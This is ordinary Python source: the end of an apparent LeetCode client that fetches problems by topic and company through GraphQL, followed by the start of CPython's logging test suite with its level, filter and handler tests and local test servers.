topicTag(slug: $slug) {
name
translatedName
questions {
status
questionId
questionFrontendId
title
titleSlug
translatedTitle
stats
difficulty
isPaidOnly
}
frequencies
}
}
'''}
headers = _make_headers()
log.info('get_problems_of_topic request: headers="%s" body="%s"', headers,
request_body)
res = session.post(LC_GRAPHQL, headers=headers, json=request_body)
log.info('get_problems_of_topic response: status="%s" body="%s"',
res.status_code, res.text)
if res.status_code != 200:
_echoerr('cannot get problems of the topic')
return {'topic_name': topic_slug, 'problems': []}
topic_tag = res.json()['data']['topicTag']
if not topic_tag:
return {'topic_name': topic_slug, 'problems': []}
if topic_tag['frequencies']:
id_to_frequency_map = json.loads(topic_tag['frequencies'])
else:
id_to_frequency_map = {}
def process_problem(p):
stats = json.loads(p['stats'])
return {
'state': _state_to_flag(p['status']),
'id': p['questionId'],
'fid': p['questionFrontendId'],
'title': p['title'],
'slug': p['titleSlug'],
'paid_only': p['isPaidOnly'],
'ac_rate': stats['totalAcceptedRaw'] / stats['totalSubmissionRaw'],
'level': p['difficulty'],
'favor': False,
'frequency': id_to_frequency_map.get(p['questionId'], 0)}
return {
'topic_name': topic_tag['name'],
'problems': [process_problem(p) for p in topic_tag['questions']]}
def get_problems_of_company(company_slug):
request_body = {
'operationName':'getCompanyTag',
'variables': {'slug': company_slug},
'query': '''query getCompanyTag($slug: String!) {
companyTag(slug: $slug) {
name
translatedName
frequencies
questions {
...questionFields
}
}
}
fragment questionFields on QuestionNode {
status
questionId
questionFrontendId
title
titleSlug
translatedTitle
stats
difficulty
isPaidOnly
frequencyTimePeriod
}
'''}
headers = _make_headers()
headers['Referer'] = 'https://leetcode.com/company/{}/'.format(company_slug)
log.info('get_problems_of_company request: headers="%s" body="%s"', headers,
request_body)
res = session.post(LC_GRAPHQL, headers=headers, json=request_body)
log.info('get_problems_of_company response: status="%s" body="%s"',
res.status_code, res.text)
if res.status_code != 200:
_echoerr('cannot get problems of the company')
return {'company_name': company_slug, 'problems': []}
company_tag = res.json()['data']['companyTag']
if not company_tag:
_echoerr('cannot get problems of the company')
return {'company_name': company_slug, 'problems': []}
if company_tag['frequencies']:
id_to_frequency_map = json.loads(company_tag['frequencies'])
else:
id_to_frequency_map = {}
def process_problem(p):
stats = json.loads(p['stats'])
return {
'state': _state_to_flag(p['status']),
'id': p['questionId'],
'fid': p['questionFrontendId'],
'title': p['title'],
'slug': p['titleSlug'],
'paid_only': p['isPaidOnly'],
'ac_rate': stats['totalAcceptedRaw'] / stats['totalSubmissionRaw'],
'level': p['difficulty'],
'favor': False,
'frequencies': id_to_frequency_map.get(p['questionId'],
EMPTY_FREQUENCIES)[4:]}
return {
'company_name': company_tag['name'],
'problems': [process_problem(p) for p in company_tag['questions']]}
def _thread_main():
global task_running, task_done, task_output, task_err
while True:
task_trigger.acquire()
task_running = True
task_done = False
task_output = None
task_err = ''
log.info('task thread input: name="%s" input="%s"', task_name, task_input)
try:
if task_name == 'test_solution':
task_output = test_solution(*task_input)
elif task_name == 'submit_solution':
task_output = submit_solution(*task_input)
except BaseException as e:
task_err = str(e)
log.info('task thread output: name="%s" output="%s" error="%s"', task_name, task_output,
task_err)
task_running = False
task_done = True
def _in_task():
return current_thread() == task_thread
def _echoerr(s):
global task_err
if _in_task():
task_err = s
else:
print(s)
def _unescape_with_Chinese(code) :
for ch in set(re.findall(r'\\u\w{4}', code)):
code = code.replace(ch, ch.encode('utf-8').decode('unicode_escape'))
log.info("code is %s", code)
return code.splitlines()
task_thread = Thread(target=_thread_main, daemon=True)
task_thread.start()
|
test_logging.py
|
# Copyright 2001-2019 by Vinay Sajip. All Rights Reserved.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose and without fee is hereby granted,
# provided that the above copyright notice appear in all copies and that
# both that copyright notice and this permission notice appear in
# supporting documentation, and that the name of Vinay Sajip
# not be used in advertising or publicity pertaining to distribution
# of the software without specific, written prior permission.
# VINAY SAJIP DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE, INCLUDING
# ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL
# VINAY SAJIP BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR
# ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER
# IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
"""Test harness for the logging module. Run all tests.
Copyright (C) 2001-2019 Vinay Sajip. All Rights Reserved.
"""
import logging
import logging.handlers
import logging.config
import codecs
import configparser
import copy
import datetime
import pathlib
import pickle
import io
import gc
import json
import os
import queue
import random
import re
import socket
import struct
import sys
import tempfile
from test.support.script_helper import assert_python_ok, assert_python_failure
from test import support
from test.support import socket_helper
from test.support.logging_helper import TestHandler
import textwrap
import threading
import time
import unittest
import warnings
import weakref
import asyncore
from http.server import HTTPServer, BaseHTTPRequestHandler
import smtpd
from urllib.parse import urlparse, parse_qs
from socketserver import (ThreadingUDPServer, DatagramRequestHandler,
ThreadingTCPServer, StreamRequestHandler)
try:
import win32evtlog, win32evtlogutil, pywintypes
except ImportError:
win32evtlog = win32evtlogutil = pywintypes = None
try:
import zlib
except ImportError:
pass
class BaseTest(unittest.TestCase):
"""Base class for logging tests."""
log_format = "%(name)s -> %(levelname)s: %(message)s"
expected_log_pat = r"^([\w.]+) -> (\w+): (\d+)$"
message_num = 0
def setUp(self):
"""Setup the default logging stream to an internal StringIO instance,
so that we can examine log output as we want."""
self._threading_key = support.threading_setup()
logger_dict = logging.getLogger().manager.loggerDict
logging._acquireLock()
try:
self.saved_handlers = logging._handlers.copy()
self.saved_handler_list = logging._handlerList[:]
self.saved_loggers = saved_loggers = logger_dict.copy()
self.saved_name_to_level = logging._nameToLevel.copy()
self.saved_level_to_name = logging._levelToName.copy()
self.logger_states = logger_states = {}
for name in saved_loggers:
logger_states[name] = getattr(saved_loggers[name],
'disabled', None)
finally:
logging._releaseLock()
# Set two unused loggers
self.logger1 = logging.getLogger("\xab\xd7\xbb")
self.logger2 = logging.getLogger("\u013f\u00d6\u0047")
self.root_logger = logging.getLogger("")
self.original_logging_level = self.root_logger.getEffectiveLevel()
self.stream = io.StringIO()
self.root_logger.setLevel(logging.DEBUG)
self.root_hdlr = logging.StreamHandler(self.stream)
self.root_formatter = logging.Formatter(self.log_format)
self.root_hdlr.setFormatter(self.root_formatter)
if self.logger1.hasHandlers():
hlist = self.logger1.handlers + self.root_logger.handlers
raise AssertionError('Unexpected handlers: %s' % hlist)
if self.logger2.hasHandlers():
hlist = self.logger2.handlers + self.root_logger.handlers
raise AssertionError('Unexpected handlers: %s' % hlist)
self.root_logger.addHandler(self.root_hdlr)
self.assertTrue(self.logger1.hasHandlers())
self.assertTrue(self.logger2.hasHandlers())
def tearDown(self):
"""Remove our logging stream, and restore the original logging
level."""
self.stream.close()
self.root_logger.removeHandler(self.root_hdlr)
while self.root_logger.handlers:
h = self.root_logger.handlers[0]
self.root_logger.removeHandler(h)
h.close()
self.root_logger.setLevel(self.original_logging_level)
logging._acquireLock()
try:
logging._levelToName.clear()
logging._levelToName.update(self.saved_level_to_name)
logging._nameToLevel.clear()
logging._nameToLevel.update(self.saved_name_to_level)
logging._handlers.clear()
logging._handlers.update(self.saved_handlers)
logging._handlerList[:] = self.saved_handler_list
manager = logging.getLogger().manager
manager.disable = 0
loggerDict = manager.loggerDict
loggerDict.clear()
loggerDict.update(self.saved_loggers)
logger_states = self.logger_states
for name in self.logger_states:
if logger_states[name] is not None:
self.saved_loggers[name].disabled = logger_states[name]
finally:
logging._releaseLock()
self.doCleanups()
support.threading_cleanup(*self._threading_key)
def assert_log_lines(self, expected_values, stream=None, pat=None):
"""Match the collected log lines against the regular expression
self.expected_log_pat, and compare the extracted group values to
the expected_values list of tuples."""
stream = stream or self.stream
pat = re.compile(pat or self.expected_log_pat)
actual_lines = stream.getvalue().splitlines()
self.assertEqual(len(actual_lines), len(expected_values))
for actual, expected in zip(actual_lines, expected_values):
match = pat.search(actual)
if not match:
self.fail("Log line does not match expected pattern:\n" +
actual)
self.assertEqual(tuple(match.groups()), expected)
s = stream.read()
if s:
self.fail("Remaining output at end of log stream:\n" + s)
def next_message(self):
"""Generate a message consisting solely of an auto-incrementing
integer."""
self.message_num += 1
return "%d" % self.message_num
class BuiltinLevelsTest(BaseTest):
"""Test builtin levels and their inheritance."""
def test_flat(self):
# Logging levels in a flat logger namespace.
m = self.next_message
ERR = logging.getLogger("ERR")
ERR.setLevel(logging.ERROR)
INF = logging.LoggerAdapter(logging.getLogger("INF"), {})
INF.setLevel(logging.INFO)
DEB = logging.getLogger("DEB")
DEB.setLevel(logging.DEBUG)
# These should log.
ERR.log(logging.CRITICAL, m())
ERR.error(m())
INF.log(logging.CRITICAL, m())
INF.error(m())
INF.warning(m())
INF.info(m())
DEB.log(logging.CRITICAL, m())
DEB.error(m())
DEB.warning(m())
DEB.info(m())
DEB.debug(m())
# These should not log.
ERR.warning(m())
ERR.info(m())
ERR.debug(m())
INF.debug(m())
self.assert_log_lines([
('ERR', 'CRITICAL', '1'),
('ERR', 'ERROR', '2'),
('INF', 'CRITICAL', '3'),
('INF', 'ERROR', '4'),
('INF', 'WARNING', '5'),
('INF', 'INFO', '6'),
('DEB', 'CRITICAL', '7'),
('DEB', 'ERROR', '8'),
('DEB', 'WARNING', '9'),
('DEB', 'INFO', '10'),
('DEB', 'DEBUG', '11'),
])
def test_nested_explicit(self):
# Logging levels in a nested namespace, all explicitly set.
m = self.next_message
INF = logging.getLogger("INF")
INF.setLevel(logging.INFO)
INF_ERR = logging.getLogger("INF.ERR")
INF_ERR.setLevel(logging.ERROR)
# These should log.
INF_ERR.log(logging.CRITICAL, m())
INF_ERR.error(m())
# These should not log.
INF_ERR.warning(m())
INF_ERR.info(m())
INF_ERR.debug(m())
self.assert_log_lines([
('INF.ERR', 'CRITICAL', '1'),
('INF.ERR', 'ERROR', '2'),
])
def test_nested_inherited(self):
# Logging levels in a nested namespace, inherited from parent loggers.
m = self.next_message
INF = logging.getLogger("INF")
INF.setLevel(logging.INFO)
INF_ERR = logging.getLogger("INF.ERR")
INF_ERR.setLevel(logging.ERROR)
INF_UNDEF = logging.getLogger("INF.UNDEF")
INF_ERR_UNDEF = logging.getLogger("INF.ERR.UNDEF")
UNDEF = logging.getLogger("UNDEF")
# These should log.
INF_UNDEF.log(logging.CRITICAL, m())
INF_UNDEF.error(m())
INF_UNDEF.warning(m())
INF_UNDEF.info(m())
INF_ERR_UNDEF.log(logging.CRITICAL, m())
INF_ERR_UNDEF.error(m())
# These should not log.
INF_UNDEF.debug(m())
INF_ERR_UNDEF.warning(m())
INF_ERR_UNDEF.info(m())
INF_ERR_UNDEF.debug(m())
self.assert_log_lines([
('INF.UNDEF', 'CRITICAL', '1'),
('INF.UNDEF', 'ERROR', '2'),
('INF.UNDEF', 'WARNING', '3'),
('INF.UNDEF', 'INFO', '4'),
('INF.ERR.UNDEF', 'CRITICAL', '5'),
('INF.ERR.UNDEF', 'ERROR', '6'),
])
def test_nested_with_virtual_parent(self):
# Logging levels when some parent does not exist yet.
m = self.next_message
INF = logging.getLogger("INF")
GRANDCHILD = logging.getLogger("INF.BADPARENT.UNDEF")
CHILD = logging.getLogger("INF.BADPARENT")
INF.setLevel(logging.INFO)
# These should log.
GRANDCHILD.log(logging.FATAL, m())
GRANDCHILD.info(m())
CHILD.log(logging.FATAL, m())
CHILD.info(m())
# These should not log.
GRANDCHILD.debug(m())
CHILD.debug(m())
self.assert_log_lines([
('INF.BADPARENT.UNDEF', 'CRITICAL', '1'),
('INF.BADPARENT.UNDEF', 'INFO', '2'),
('INF.BADPARENT', 'CRITICAL', '3'),
('INF.BADPARENT', 'INFO', '4'),
])
def test_regression_22386(self):
"""See issue #22386 for more information."""
self.assertEqual(logging.getLevelName('INFO'), logging.INFO)
self.assertEqual(logging.getLevelName(logging.INFO), 'INFO')
def test_issue27935(self):
fatal = logging.getLevelName('FATAL')
self.assertEqual(fatal, logging.FATAL)
def test_regression_29220(self):
"""See issue #29220 for more information."""
logging.addLevelName(logging.INFO, '')
self.addCleanup(logging.addLevelName, logging.INFO, 'INFO')
self.assertEqual(logging.getLevelName(logging.INFO), '')
self.assertEqual(logging.getLevelName(logging.NOTSET), 'NOTSET')
self.assertEqual(logging.getLevelName('NOTSET'), logging.NOTSET)
class BasicFilterTest(BaseTest):
"""Test the bundled Filter class."""
def test_filter(self):
# Only messages satisfying the specified criteria pass through the
# filter.
filter_ = logging.Filter("spam.eggs")
handler = self.root_logger.handlers[0]
try:
handler.addFilter(filter_)
spam = logging.getLogger("spam")
spam_eggs = logging.getLogger("spam.eggs")
spam_eggs_fish = logging.getLogger("spam.eggs.fish")
spam_bakedbeans = logging.getLogger("spam.bakedbeans")
spam.info(self.next_message())
spam_eggs.info(self.next_message()) # Good.
spam_eggs_fish.info(self.next_message()) # Good.
spam_bakedbeans.info(self.next_message())
self.assert_log_lines([
('spam.eggs', 'INFO', '2'),
('spam.eggs.fish', 'INFO', '3'),
])
finally:
handler.removeFilter(filter_)
def test_callable_filter(self):
# Only messages satisfying the specified criteria pass through the
# filter.
def filterfunc(record):
parts = record.name.split('.')
prefix = '.'.join(parts[:2])
return prefix == 'spam.eggs'
handler = self.root_logger.handlers[0]
try:
handler.addFilter(filterfunc)
spam = logging.getLogger("spam")
spam_eggs = logging.getLogger("spam.eggs")
spam_eggs_fish = logging.getLogger("spam.eggs.fish")
spam_bakedbeans = logging.getLogger("spam.bakedbeans")
spam.info(self.next_message())
spam_eggs.info(self.next_message()) # Good.
spam_eggs_fish.info(self.next_message()) # Good.
spam_bakedbeans.info(self.next_message())
self.assert_log_lines([
('spam.eggs', 'INFO', '2'),
('spam.eggs.fish', 'INFO', '3'),
])
finally:
handler.removeFilter(filterfunc)
def test_empty_filter(self):
f = logging.Filter()
r = logging.makeLogRecord({'name': 'spam.eggs'})
self.assertTrue(f.filter(r))
#
# First, we define our levels. There can be as many as you want - the only
# limitations are that they should be integers, the lowest should be > 0 and
# larger values mean less information being logged. If you need specific
# level values which do not fit into these limitations, you can use a
# mapping dictionary to convert between your application levels and the
# logging system.
#
SILENT = 120
TACITURN = 119
TERSE = 118
EFFUSIVE = 117
SOCIABLE = 116
VERBOSE = 115
TALKATIVE = 114
GARRULOUS = 113
CHATTERBOX = 112
BORING = 111
LEVEL_RANGE = range(BORING, SILENT + 1)
#
# Next, we define names for our levels. You don't need to do this - in which
# case the system will use "Level n" to denote the text for the level.
#
my_logging_levels = {
SILENT : 'Silent',
TACITURN : 'Taciturn',
TERSE : 'Terse',
EFFUSIVE : 'Effusive',
SOCIABLE : 'Sociable',
VERBOSE : 'Verbose',
TALKATIVE : 'Talkative',
GARRULOUS : 'Garrulous',
CHATTERBOX : 'Chatterbox',
BORING : 'Boring',
}
class GarrulousFilter(logging.Filter):
"""A filter which blocks garrulous messages."""
def filter(self, record):
return record.levelno != GARRULOUS
class VerySpecificFilter(logging.Filter):
"""A filter which blocks sociable and taciturn messages."""
def filter(self, record):
return record.levelno not in [SOCIABLE, TACITURN]
class CustomLevelsAndFiltersTest(BaseTest):
"""Test various filtering possibilities with custom logging levels."""
# Skip the logger name group.
expected_log_pat = r"^[\w.]+ -> (\w+): (\d+)$"
def setUp(self):
BaseTest.setUp(self)
for k, v in my_logging_levels.items():
logging.addLevelName(k, v)
def log_at_all_levels(self, logger):
for lvl in LEVEL_RANGE:
logger.log(lvl, self.next_message())
def test_logger_filter(self):
# Filter at logger level.
self.root_logger.setLevel(VERBOSE)
# Levels >= 'Verbose' are good.
self.log_at_all_levels(self.root_logger)
self.assert_log_lines([
('Verbose', '5'),
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
])
def test_handler_filter(self):
# Filter at handler level.
self.root_logger.handlers[0].setLevel(SOCIABLE)
try:
# Levels >= 'Sociable' are good.
self.log_at_all_levels(self.root_logger)
self.assert_log_lines([
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
])
finally:
self.root_logger.handlers[0].setLevel(logging.NOTSET)
def test_specific_filters(self):
# Set a specific filter object on the handler, and then add another
# filter object on the logger itself.
handler = self.root_logger.handlers[0]
specific_filter = None
garr = GarrulousFilter()
handler.addFilter(garr)
try:
self.log_at_all_levels(self.root_logger)
first_lines = [
# Notice how 'Garrulous' is missing
('Boring', '1'),
('Chatterbox', '2'),
('Talkative', '4'),
('Verbose', '5'),
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
]
self.assert_log_lines(first_lines)
specific_filter = VerySpecificFilter()
self.root_logger.addFilter(specific_filter)
self.log_at_all_levels(self.root_logger)
self.assert_log_lines(first_lines + [
# Not only 'Garrulous' is still missing, but also 'Sociable'
# and 'Taciturn'
('Boring', '11'),
('Chatterbox', '12'),
('Talkative', '14'),
('Verbose', '15'),
('Effusive', '17'),
('Terse', '18'),
('Silent', '20'),
])
finally:
if specific_filter:
self.root_logger.removeFilter(specific_filter)
handler.removeFilter(garr)
class HandlerTest(BaseTest):
def test_name(self):
h = logging.Handler()
h.name = 'generic'
self.assertEqual(h.name, 'generic')
h.name = 'anothergeneric'
self.assertEqual(h.name, 'anothergeneric')
self.assertRaises(NotImplementedError, h.emit, None)
def test_builtin_handlers(self):
# We can't actually *use* too many handlers in the tests,
# but we can try instantiating them with various options
if sys.platform in ('linux', 'darwin'):
for existing in (True, False):
fd, fn = tempfile.mkstemp()
os.close(fd)
if not existing:
os.unlink(fn)
h = logging.handlers.WatchedFileHandler(fn, delay=True)
if existing:
dev, ino = h.dev, h.ino
self.assertEqual(dev, -1)
self.assertEqual(ino, -1)
r = logging.makeLogRecord({'msg': 'Test'})
h.handle(r)
# Now remove the file.
os.unlink(fn)
self.assertFalse(os.path.exists(fn))
# The next call should recreate the file.
h.handle(r)
self.assertTrue(os.path.exists(fn))
else:
self.assertEqual(h.dev, -1)
self.assertEqual(h.ino, -1)
h.close()
if existing:
os.unlink(fn)
if sys.platform == 'darwin':
sockname = '/var/run/syslog'
else:
sockname = '/dev/log'
try:
h = logging.handlers.SysLogHandler(sockname)
self.assertEqual(h.facility, h.LOG_USER)
self.assertTrue(h.unixsocket)
h.close()
except OSError: # syslogd might not be available
pass
for method in ('GET', 'POST', 'PUT'):
if method == 'PUT':
self.assertRaises(ValueError, logging.handlers.HTTPHandler,
'localhost', '/log', method)
else:
h = logging.handlers.HTTPHandler('localhost', '/log', method)
h.close()
h = logging.handlers.BufferingHandler(0)
r = logging.makeLogRecord({})
self.assertTrue(h.shouldFlush(r))
h.close()
h = logging.handlers.BufferingHandler(1)
self.assertFalse(h.shouldFlush(r))
h.close()
def test_path_objects(self):
"""
Test that Path objects are accepted as filename arguments to handlers.
See Issue #27493.
"""
fd, fn = tempfile.mkstemp()
os.close(fd)
os.unlink(fn)
pfn = pathlib.Path(fn)
cases = (
(logging.FileHandler, (pfn, 'w')),
(logging.handlers.RotatingFileHandler, (pfn, 'a')),
(logging.handlers.TimedRotatingFileHandler, (pfn, 'h')),
)
if sys.platform in ('linux', 'darwin'):
cases += ((logging.handlers.WatchedFileHandler, (pfn, 'w')),)
for cls, args in cases:
h = cls(*args)
self.assertTrue(os.path.exists(fn))
h.close()
os.unlink(fn)
@unittest.skipIf(os.name == 'nt', 'WatchedFileHandler not appropriate for Windows.')
def test_race(self):
# Issue #14632 refers.
def remove_loop(fname, tries):
for _ in range(tries):
try:
os.unlink(fname)
self.deletion_time = time.time()
except OSError:
pass
time.sleep(0.004 * random.randint(0, 4))
del_count = 500
log_count = 500
self.handle_time = None
self.deletion_time = None
for delay in (False, True):
fd, fn = tempfile.mkstemp('.log', 'test_logging-3-')
os.close(fd)
remover = threading.Thread(target=remove_loop, args=(fn, del_count))
remover.daemon = True
remover.start()
h = logging.handlers.WatchedFileHandler(fn, delay=delay)
f = logging.Formatter('%(asctime)s: %(levelname)s: %(message)s')
h.setFormatter(f)
try:
for _ in range(log_count):
time.sleep(0.005)
r = logging.makeLogRecord({'msg': 'testing' })
try:
self.handle_time = time.time()
h.handle(r)
except Exception:
print('Deleted at %s, '
'opened at %s' % (self.deletion_time,
self.handle_time))
raise
finally:
remover.join()
h.close()
if os.path.exists(fn):
os.unlink(fn)
# The implementation relies on os.register_at_fork existing, but we test
# based on os.fork existing because that is what users and this test use.
# This helps ensure that when fork exists (the important concept) that the
# register_at_fork mechanism is also present and used.
@unittest.skipIf(not hasattr(os, 'fork'), 'Test requires os.fork().')
def test_post_fork_child_no_deadlock(self):
"""Ensure child logging locks are not held; bpo-6721 & bpo-36533."""
class _OurHandler(logging.Handler):
def __init__(self):
super().__init__()
self.sub_handler = logging.StreamHandler(
stream=open('/dev/null', 'wt'))
def emit(self, record):
self.sub_handler.acquire()
try:
self.sub_handler.emit(record)
finally:
self.sub_handler.release()
self.assertEqual(len(logging._handlers), 0)
refed_h = _OurHandler()
self.addCleanup(refed_h.sub_handler.stream.close)
refed_h.name = 'because we need at least one for this test'
self.assertGreater(len(logging._handlers), 0)
self.assertGreater(len(logging._at_fork_reinit_lock_weakset), 1)
test_logger = logging.getLogger('test_post_fork_child_no_deadlock')
test_logger.addHandler(refed_h)
test_logger.setLevel(logging.DEBUG)
locks_held__ready_to_fork = threading.Event()
fork_happened__release_locks_and_end_thread = threading.Event()
def lock_holder_thread_fn():
logging._acquireLock()
try:
refed_h.acquire()
try:
# Tell the main thread to do the fork.
locks_held__ready_to_fork.set()
# If the deadlock bug exists, the fork will happen
# without dealing with the locks we hold, deadlocking
# the child.
# Wait for a successful fork or an unreasonable amount of
# time before releasing our locks. To avoid a timing based
# test we'd need communication from os.fork() as to when it
# has actually happened. Given this is a regression test
# for a fixed issue, potentially less reliably detecting
# regression via timing is acceptable for simplicity.
# The test will always take at least this long. :(
fork_happened__release_locks_and_end_thread.wait(0.5)
finally:
refed_h.release()
finally:
logging._releaseLock()
lock_holder_thread = threading.Thread(
target=lock_holder_thread_fn,
name='test_post_fork_child_no_deadlock lock holder')
lock_holder_thread.start()
locks_held__ready_to_fork.wait()
pid = os.fork()
if pid == 0:
# Child process
try:
test_logger.info(r'Child process did not deadlock. \o/')
finally:
os._exit(0)
else:
# Parent process
test_logger.info(r'Parent process returned from fork. \o/')
fork_happened__release_locks_and_end_thread.set()
lock_holder_thread.join()
support.wait_process(pid, exitcode=0)
class BadStream(object):
def write(self, data):
raise RuntimeError('deliberate mistake')
class TestStreamHandler(logging.StreamHandler):
def handleError(self, record):
self.error_record = record
class StreamWithIntName(object):
level = logging.NOTSET
name = 2
class StreamHandlerTest(BaseTest):
def test_error_handling(self):
h = TestStreamHandler(BadStream())
r = logging.makeLogRecord({})
old_raise = logging.raiseExceptions
try:
h.handle(r)
self.assertIs(h.error_record, r)
h = logging.StreamHandler(BadStream())
with support.captured_stderr() as stderr:
h.handle(r)
msg = '\nRuntimeError: deliberate mistake\n'
self.assertIn(msg, stderr.getvalue())
logging.raiseExceptions = False
with support.captured_stderr() as stderr:
h.handle(r)
self.assertEqual('', stderr.getvalue())
finally:
logging.raiseExceptions = old_raise
def test_stream_setting(self):
"""
Test setting the handler's stream
"""
h = logging.StreamHandler()
stream = io.StringIO()
old = h.setStream(stream)
self.assertIs(old, sys.stderr)
actual = h.setStream(old)
self.assertIs(actual, stream)
# test that setting to existing value returns None
actual = h.setStream(old)
self.assertIsNone(actual)
def test_can_represent_stream_with_int_name(self):
h = logging.StreamHandler(StreamWithIntName())
self.assertEqual(repr(h), '<StreamHandler 2 (NOTSET)>')
# -- The following section could be moved into a server_helper.py module
# -- if it proves to be of wider utility than just test_logging
class TestSMTPServer(smtpd.SMTPServer):
"""
This class implements a test SMTP server.
:param addr: A (host, port) tuple which the server listens on.
You can specify a port value of zero: the server's
*port* attribute will hold the actual port number
used, which can be used in client connections.
:param handler: A callable which will be called to process
incoming messages. The handler will be passed
the client address tuple, who the message is from,
a list of recipients and the message data.
:param poll_interval: The interval, in seconds, used in the underlying
:func:`select` or :func:`poll` call by
:func:`asyncore.loop`.
:param sockmap: A dictionary which will be used to hold
:class:`asyncore.dispatcher` instances used by
:func:`asyncore.loop`. This avoids changing the
:mod:`asyncore` module's global state.
"""
def __init__(self, addr, handler, poll_interval, sockmap):
smtpd.SMTPServer.__init__(self, addr, None, map=sockmap,
decode_data=True)
self.port = self.socket.getsockname()[1]
self._handler = handler
self._thread = None
self._quit = False
self.poll_interval = poll_interval
def process_message(self, peer, mailfrom, rcpttos, data):
"""
Delegates to the handler passed in to the server's constructor.
Typically, this will be a test case method.
:param peer: The client (host, port) tuple.
:param mailfrom: The address of the sender.
:param rcpttos: The addresses of the recipients.
:param data: The message.
"""
self._handler(peer, mailfrom, rcpttos, data)
def start(self):
"""
Start the server running on a separate daemon thread.
"""
self._thread = t = threading.Thread(target=self.serve_forever,
args=(self.poll_interval,))
t.setDaemon(True)
t.start()
def serve_forever(self, poll_interval):
"""
Run the :mod:`asyncore` loop until normal termination
conditions arise.
:param poll_interval: The interval, in seconds, used in the underlying
:func:`select` or :func:`poll` call by
:func:`asyncore.loop`.
"""
while not self._quit:
asyncore.loop(poll_interval, map=self._map, count=1)
def stop(self):
"""
Stop the thread by closing the server instance.
Wait for the server thread to terminate.
"""
self._quit = True
support.join_thread(self._thread)
self._thread = None
self.close()
asyncore.close_all(map=self._map, ignore_all=True)
class ControlMixin(object):
"""
This mixin is used to start a server on a separate thread, and
shut it down programmatically. Request handling is simplified - instead
of needing to derive a suitable RequestHandler subclass, you just
provide a callable which will be passed each received request to be
processed.
:param handler: A handler callable which will be called with a
single parameter - the request - in order to
process the request. This handler is called on the
server thread, effectively meaning that requests are
processed serially. While not quite Web scale ;-),
this should be fine for testing applications.
:param poll_interval: The polling interval in seconds.
"""
def __init__(self, handler, poll_interval):
self._thread = None
self.poll_interval = poll_interval
self._handler = handler
self.ready = threading.Event()
def start(self):
"""
Create a daemon thread to run the server, and start it.
"""
self._thread = t = threading.Thread(target=self.serve_forever,
args=(self.poll_interval,))
t.setDaemon(True)
t.start()
def serve_forever(self, poll_interval):
"""
Run the server. Set the ready flag before entering the
service loop.
"""
self.ready.set()
super(ControlMixin, self).serve_forever(poll_interval)
def stop(self):
"""
Tell the server thread to stop, and wait for it to do so.
"""
self.shutdown()
if self._thread is not None:
support.join_thread(self._thread)
self._thread = None
self.server_close()
self.ready.clear()
class TestHTTPServer(ControlMixin, HTTPServer):
"""
An HTTP server which is controllable using :class:`ControlMixin`.
:param addr: A tuple with the IP address and port to listen on.
:param handler: A handler callable which will be called with a
single parameter - the request - in order to
process the request.
:param poll_interval: The polling interval in seconds.
:param log: Pass ``True`` to enable log messages.
"""
def __init__(self, addr, handler, poll_interval=0.5,
log=False, sslctx=None):
class DelegatingHTTPRequestHandler(BaseHTTPRequestHandler):
def __getattr__(self, name, default=None):
if name.startswith('do_'):
return self.process_request
raise AttributeError(name)
def process_request(self):
self.server._handler(self)
def log_message(self, format, *args):
if log:
super(DelegatingHTTPRequestHandler,
self).log_message(format, *args)
HTTPServer.__init__(self, addr, DelegatingHTTPRequestHandler)
ControlMixin.__init__(self, handler, poll_interval)
self.sslctx = sslctx
def get_request(self):
try:
sock, addr = self.socket.accept()
if self.sslctx:
sock = self.sslctx.wrap_socket(sock, server_side=True)
except OSError as e:
# socket errors are silenced by the caller, print them here
sys.stderr.write("Got an error:\n%s\n" % e)
raise
return sock, addr
class TestTCPServer(ControlMixin, ThreadingTCPServer):
"""
A TCP server which is controllable using :class:`ControlMixin`.
:param addr: A tuple with the IP address and port to listen on.
:param handler: A handler callable which will be called with a single
parameter - the request - in order to process the request.
:param poll_interval: The polling interval in seconds.
:bind_and_activate: If True (the default), binds the server and starts it
listening. If False, you need to call
:meth:`server_bind` and :meth:`server_activate` at
some later time before calling :meth:`start`, so that
the server will set up the socket and listen on it.
"""
allow_reuse_address = True
def __init__(self, addr, handler, poll_interval=0.5,
bind_and_activate=True):
class DelegatingTCPRequestHandler(StreamRequestHandler):
def handle(self):
self.server._handler(self)
ThreadingTCPServer.__init__(self, addr, DelegatingTCPRequestHandler,
bind_and_activate)
ControlMixin.__init__(self, handler, poll_interval)
def server_bind(self):
super(TestTCPServer, self).server_bind()
self.port = self.socket.getsockname()[1]
class TestUDPServer(ControlMixin, ThreadingUDPServer):
"""
A UDP server which is controllable using :class:`ControlMixin`.
:param addr: A tuple with the IP address and port to listen on.
:param handler: A handler callable which will be called with a
single parameter - the request - in order to
process the request.
:param poll_interval: The polling interval for shutdown requests,
in seconds.
:bind_and_activate: If True (the default), binds the server and
starts it listening. If False, you need to
call :meth:`server_bind` and
:meth:`server_activate` at some later time
before calling :meth:`start`, so that the server will
set up the socket and listen on it.
"""
def __init__(self, addr, handler, poll_interval=0.5,
bind_and_activate=True):
class DelegatingUDPRequestHandler(DatagramRequestHandler):
def handle(self):
self.server._handler(self)
def finish(self):
data = self.wfile.getvalue()
if data:
try:
super(DelegatingUDPRequestHandler, self).finish()
except OSError:
if not self.server._closed:
raise
ThreadingUDPServer.__init__(self, addr,
DelegatingUDPRequestHandler,
bind_and_activate)
ControlMixin.__init__(self, handler, poll_interval)
self._closed = False
def server_bind(self):
super(TestUDPServer, self).server_bind()
self.port = self.socket.getsockname()[1]
def server_close(self):
super(TestUDPServer, self).server_close()
self._closed = True
if hasattr(socket, "AF_UNIX"):
class TestUnixStreamServer(TestTCPServer):
address_family = socket.AF_UNIX
class TestUnixDatagramServer(TestUDPServer):
address_family = socket.AF_UNIX
